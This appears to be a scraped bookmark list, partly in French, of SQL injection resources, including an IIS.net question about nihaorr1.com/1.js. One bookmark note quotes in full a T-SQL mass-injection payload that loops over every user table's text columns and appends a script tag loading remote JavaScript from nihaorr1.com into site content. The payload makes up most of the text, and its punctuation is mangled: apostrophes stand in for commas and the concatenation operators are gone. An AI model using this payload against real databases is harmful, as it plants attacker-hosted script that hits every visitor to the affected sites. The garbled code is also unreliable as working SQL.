2012
Faire face aux injections SQL
by astrochoupe2009
2008
Ghosts In The Stack - Blind SQL Injections
by damdec & 1 otherAnyone know about www.nihaorr1.com/1.js? - IIS.net
by night.kame (via)Avec SQL Server, la vie est plus simple.DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor